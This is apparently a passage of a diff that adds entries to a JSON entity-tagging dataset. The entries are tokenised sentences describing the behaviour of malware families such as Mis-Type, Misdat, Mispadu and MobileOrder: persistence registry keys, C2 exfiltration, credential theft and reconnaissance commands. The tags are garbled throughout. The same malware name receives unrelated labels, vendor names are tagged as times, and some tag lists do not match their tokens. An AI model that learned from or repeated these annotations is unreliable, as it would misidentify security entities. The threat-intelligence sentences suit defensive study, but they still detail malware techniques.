"machine." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MiniDuke", + "uses", + "HTTP", + "and", + "HTTPS", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MirageFox", + "is", + "likely", + "loaded", + "via", + "DLL", + "hijacking", + "into", + "a", + "legitimate", + "McAfee", + "binary." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "B-Time", + "O" + ] + }, + { + "tokens": [ + "MirageFox", + "has", + "a", + "function", + "for", + "decrypting", + "data", + "containing", + "C2", + "configuration", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MirageFox", + "can", + "collect", + "CPU", + "and", + "architecture", + "information", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MirageFox", + "can", + "gather", + "the", + "username", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MirageFox", + "has", + "the", + "capability", + "to", + "execute", + "commands", + "using", + "cmd.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Mis-Type", + "has", + "created", + "registry", + "keys", + "for", + "persistence,", + "including", + "`HKCU\\Software\\bkfouerioyou`,", + "`HKLM\\SOFTWARE\\Microsoft\\Active", + "Setup\\Installed", + "Components\\{6afa8072-b2b1-31a8-b5c1-{Unique", + "Identifier}`,", + "and", + "`HKLM\\SOFTWARE\\Microsoft\\Active", + "Setup\\Installed", + "Components\\{3BF41072-B2B1-31A8-B5C1-{Unique", + "Identifier}`." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mis-Type", + "has", + "collected", + "files", + "and", + "data", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mis-Type", + "has", + "transmitted", + "collected", + "files", + "and", + "data", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mis-Type", + "first", + "attempts", + "to", + "use", + "a", + "Base64-encoded", + "network", + "protocol", + "over", + "a", + "raw", + "TCP", + "socket", + "for", + "C2,", + "and", + "if", + "that", + "method", + "fails,", + "falls", + "back", + "to", + "a", + "secondary", + "HTTP-based", + "protocol", + "to", + "communicate", + "to", + "an", + "alternate", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mis-Type", + "has", + "downloaded", + "additional", + "malware", + "and", + "files", + "onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mis-Type", + "may", + "create", + "a", + "file", + "containing", + "the", + "results", + "of", + "the", + "command", + "<code>cmd.exe", + "/c", + "net", + "user", + "{Username}</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mis-Type", + "may", + "create", + "a", + "temporary", + "user", + "on", + "the", + "system", + "named", + "`Lost_{Unique", + "Identifier}`." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mis-Type", + "has", + "temporarily", + "stored", + "collected", + "information", + "to", + "the", + "files", + "`“%AppData%\\{Unique", + "Identifier}\\HOSTRURKLSR”`", + "and", + "`“%AppData%\\{Unique", + "Identifier}\\NEWERSSEMP”`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mis-Type", + "saves", + "itself", + "as", + "a", + "file", + "named", + "`msdtc.exe`,", + "which", + "is", + "also", + "the", + "name", + "of", + "the", + "legitimate", + "Microsoft", + "Distributed", + "Transaction", + "Coordinator", + "service", + "binary." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O" + ] + }, + { + "tokens": [ + "Mis-Type", + "has", + "used", + "Windows", + "API", + "calls,", + "including", + "`NetUserAdd`", + "and", + "`NetUserDel`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Mis-Type", + "network", + "traffic", + "can", + "communicate", + "over", + "a", + "raw", + "socket." + ], + "ner_tags": [ + "B-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mis-Type", + "has", + "been", + "injected", + "directly", + "into", + "a", + "running", + "process,", + "including", + "`explorer.exe`." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Mis-Type", + "uses", + "Base64", + "encoding", + "for", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "initial", + "beacon", + "packet", + "for", + "Mis-Type", + "contains", + "the", + "operating", + "system", + "version", + "and", + "file", + "system", + "of", + "the", + "victim." + ], + "ner_tags": [ + "O", + "O", + "I-Way", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mis-Type", + "may", + "create", + "a", + "file", + "containing", + "the", + "results", + "of", + "the", + "command", + "<code>cmd.exe", + "/c", + "ipconfig", + "/all</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Mis-Type", + "runs", + "tests", + "to", + "determine", + "the", + "privilege", + "level", + "of", + "the", + "compromised", + "user." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mis-Type", + "network", + "traffic", + "can", + "communicate", + "over", + "HTTP." + ], + "ner_tags": [ + "B-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Mis-Type", + "has", + "used", + "`cmd.exe`", + "to", + "run", + "commands", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Misdat", + "has", + "created", + "registry", + "keys", + "for", + "persistence,", + "including", + "`HKCU\\Software\\dnimtsoleht\\StubPath`,", + "`HKCU\\Software\\snimtsOleht\\StubPath`,", + "`HKCU\\Software\\Backtsaleht\\StubPath`,", + "`HKLM\\SOFTWARE\\Microsoft\\Active", + "Setup\\Installed.", + "Components\\{3bf41072-b2b1-21c8-b5c1-bd56d32fbda7}`,", + "and", + "`HKLM\\SOFTWARE\\Microsoft\\Active", + "Setup\\Installed", + "Components\\{3ef41072-a2f1-21c8-c5c1-70c2c3bc7905}`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Misdat", + "is", + "capable", + "of", + "deleting", + "Registry", + "keys", + "used", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Misdat", + "has", + "collected", + "files", + "and", + "data", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Misdat", + "has", + "uploaded", + "files", + "and", + "data", + "to", + "its", + "C2", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Misdat", + "is", + "capable", + "of", + "deleting", + "the", + "backdoor", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "Misdat", + "is", + "capable", + "of", + "running", + "commands", + "to", + "obtain", + "a", + "list", + "of", + "files", + "and", + "directories,", + "as", + "well", + "as", + "enumerating", + "logical", + "drives." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Misdat", + "is", + "capable", + "of", + "downloading", + "files", + "from", + "the", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Misdat", + "saves", + "itself", + "as", + "a", + "file", + "named", + "`msdtc.exe`,", + "which", + "is", + "also", + "the", + "name", + "of", + "the", + "legitimate", + "Microsoft", + "Distributed", + "Transaction", + "Coordinator", + "service", + "binary." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-Org", + "O", + "O" + ] + }, + { + "tokens": [ + "Misdat", + "has", + "used", + "Windows", + "APIs,", + "including", + "`ExitWindowsEx`", + "and", + "`GetKeyboardType`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Misdat", + "network", + "traffic", + "communicates", + "over", + "a", + "raw", + "socket." + ], + "ner_tags": [ + "B-Org", + "B-OffAct", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Misdat", + "was", + "typically", + "packed", + "using", + "UPX." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Misdat", + "network", + "traffic", + "is", + "Base64-encoded", + "plaintext." + ], + "ner_tags": [ + "B-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "initial", + "beacon", + "packet", + "for", + "Misdat", + "contains", + "the", + "operating", + "system", + "version", + "of", + "the", + "victim." + ], + "ner_tags": [ + "O", + "O", + "I-Way", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Misdat", + "has", + "attempted", + "to", + "detect", + "if", + "a", + "compromised", + "host", + "had", + "a", + "Japanese", + "keyboard", + "via", + "the", + "Windows", + "API", + "call", + "`GetKeyboardType`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Many", + "Misdat", + "samples", + "were", + "programmed", + "using", + "Borland", + "Delphi,", + "which", + "will", + "mangle", + "the", + "default", + "PE", + "compile", + "timestamp", + "of", + "a", + "file." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Misdat", + "is", + "capable", + "of", + "providing", + "shell", + "functionality", + "to", + "the", + "attacker", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mispadu", + "contains", + "a", + "copy", + "of", + "the", + "OpenSSL", + "library", + "to", + "encrypt", + "C2", + "traffic." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mispadu", + "utilizes", + "malicious", + "Google", + "Chrome", + "browser", + "extensions", + "to", + "steal", + "financial", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Mispadu", + "can", + "monitor", + "browser", + "activity", + "for", + "online", + "banking", + "actions", + "and", + "display", + "full-screen", + "overlay", + "images", + "to", + "block", + "user", + "access", + "to", + "the", + "intended", + "site", + "or", + "present", + "additional", + "data", + "fields." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-OffAct", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mispadu", + "has", + "the", + "ability", + "to", + "capture", + "and", + "replace", + "Bitcoin", + "wallet", + "data", + "in", + "the", + "clipboard", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mispadu", + "has", + "obtained", + "credentials", + "from", + "mail", + "clients", + "via", + "NirSoft", + "MailPassView." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O" + ] + }, + { + "tokens": [ + "Mispadu", + "can", + "steal", + "credentials", + "from", + "Google", + "Chrome." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mispadu", + "decrypts", + "its", + "encrypted", + "configuration", + "files", + "prior", + "to", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mispadu", + "uses", + "a", + "custom", + "algorithm", + "to", + "obfuscate", + "its", + "internal", + "strings", + "and", + "uses", + "hardcoded", + "keys.", + "Mispadu", + "also", + "uses", + "encoded", + "configuration", + "files", + "and", + "has", + "encoded", + "payloads", + "using", + "Base64." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mispadu", + "can", + "sends", + "the", + "collected", + "financial", + "data", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mispadu", + "searches", + "for", + "various", + "filesystem", + "paths", + "to", + "determine", + "what", + "banking", + "applications", + "are", + "installed", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mispadu", + "can", + "monitor", + "browser", + "activity", + "for", + "online", + "banking", + "actions", + "and", + "display", + "full-screen", + "overlay", + "images", + "to", + "block", + "user", + "access", + "to", + "the", + "intended", + "site", + "or", + "present", + "additional", + "data", + "fields." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-OffAct", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mispadu", + "can", + "log", + "keystrokes", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mispadu", + "has", + "relied", + "on", + "users", + "to", + "execute", + "malicious", + "files", + "in", + "order", + "to", + "gain", + "execution", + "on", + "victim", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mispadu", + "has", + "been", + "installed", + "via", + "MSI", + "installer." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Mispadu", + "has", + "used", + "a", + "variety", + "of", + "Windows", + "API", + "calls,", + "including", + "ShellExecute", + "and", + "WriteProcessMemory." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Mispadu", + "can", + "enumerate", + "the", + "running", + "processes", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mispadu's", + "binary", + "is", + "injected", + "into", + "memory", + "via", + "`WriteProcessMemory`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Mispadu", + "creates", + "a", + "link", + "in", + "the", + "startup", + "folder", + "for", + "persistence.", + "Mispadu", + "adds", + "persistence", + "via", + "the", + "registry", + "key", + "`HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mispadu", + "uses", + "RunDLL32", + "for", + "execution", + "via", + "its", + "injector", + "DLL." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Mispadu", + "has", + "the", + "ability", + "to", + "capture", + "screenshots", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mispadu", + "can", + "list", + "installed", + "security", + "products", + "in", + "the", + "victim’s", + "environment." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mispadu", + "has", + "been", + "spread", + "via", + "malicious", + "links", + "embedded", + "in", + "emails." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Mispadu", + "can", + "run", + "checks", + "to", + "verify", + "if", + "it", + "is", + "running", + "within", + "a", + "virtualized", + "environments", + "including", + "Hyper-V,", + "VirtualBox", + "or", + "VMWare", + "and", + "will", + "terminate", + "execution", + "if", + "the", + "computer", + "name", + "is", + "“JOHN-PC.”" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Mispadu", + "collects", + "the", + "OS", + "version,", + "computer", + "name,", + "and", + "language", + "ID." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mispadu", + "checks", + "and", + "will", + "terminate", + "execution", + "if", + "the", + "compromised", + "system’s", + "language", + "ID", + "is", + "not", + "Spanish", + "or", + "Portuguese." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mispadu’s", + "dropper", + "uses", + "VBS", + "files", + "to", + "install", + "payloads", + "and", + "perform", + "execution." + ], + "ner_tags": [ + "B-Idus", + "B-SamFile", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mivast", + "has", + "the", + "capability", + "to", + "download", + "and", + "execute", + ".exe", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Mivast", + "creates", + "the", + "following", + "Registry", + "entry:", + "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Micromedia</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Mivast", + "has", + "the", + "capability", + "to", + "gather", + "NTLM", + "password", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Mivast", + "has", + "the", + "capability", + "to", + "open", + "a", + "remote", + "shell", + "and", + "run", + "basic", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MobileOrder", + "has", + "a", + "command", + "to", + "upload", + "to", + "its", + "C2", + "server", + "victim", + "browser", + "bookmarks." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MobileOrder", + "exfiltrates", + "data", + "collected", + "from", + "the", + "victim", + "mobile", + "device." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MobileOrder", + "exfiltrates", + "data", + "to", + "its", + "C2", + "server", + "over", + "the", + "same", + "protocol", + "as", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MobileOrder", + "has", + "a", + "command", + "to", + "upload", + "to", + "its", + "C2", + "server", + "information", + "about", + "files", + "on", + "the", + "victim", + "mobile", + "device,", + "including", + "SD", + "card", + "size,", + "installed", + "app", + "list,", + "SMS", + "content,", + "contacts,", + "and", + "calling", + "history." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MobileOrder", + "has", + "a", + "command", + "to", + "download", + "a", + "file", + "from", + "the", + "C2", + "server", + "to", + "the", + "victim", + "mobile", + "device's", + "SD", + "card." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MobileOrder", + "has", + "a", + "command", + "to", + "upload", + "information", + "about", + "all", + "running", + "processes", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MobileOrder", + "has", + "a", + "command", + "to", + "upload", + "to", + "its", + "C2", + "server", + "victim", + "mobile", + "device", + "information,", + "including", + "IMEI,", + "IMSI,", + "SIM", + "card", + "serial", + "number,", + "phone", + "number,", + "Android", + "version,", + "and", + "other", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoleNet", + "can", + "download", + "additional", + "payloads", + "from", + "the", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoleNet", + "can", + "use", + "PowerShell", + "to", + "set", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoleNet", + "can", + "achieve", + "persitence", + "on", + "the", + "infected", + "machine", + "by", + "setting", + "the", + "Registry", + "run", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoleNet", + "can", + "use", + "WMI", + "commands", + "to", + "check", + "the", + "system", + "for", + "firewall", + "and", + "antivirus", + "software." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoleNet", + "can", + "collect", + "information", + "about", + "the", + "about", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoleNet", + "can", + "execute", + "commands", + "via", + "the", + "command", + "line", + "utility." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoleNet", + "can", + "perform", + "WMI", + "commands", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mongall", + "has", + "the", + "ability", + "to", + "upload", + "files", + "from", + "victim's", + "machines." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mongall", + "has", + "the", + "ability", + "to", + "decrypt", + "its", + "payload", + "prior", + "to", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mongall", + "can", + "inject", + "a", + "DLL", + "into", + "`rundll32.exe`", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "B-Way", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Mongall", + "can", + "upload", + "files", + "and", + "information", + "from", + "a", + "compromised", + "host", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mongall", + "can", + "download", + "files", + "to", + "targeted", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mongall", + "has", + "relied", + "on", + "a", + "user", + "opening", + "a", + "malicious", + "document", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mongall", + "can", + "identify", + "removable", + "media", + "attached", + "to", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mongall", + "can", + "establish", + "persistence", + "with", + "the", + "auto", + "start", + "function", + "including", + "using", + "the", + "value", + 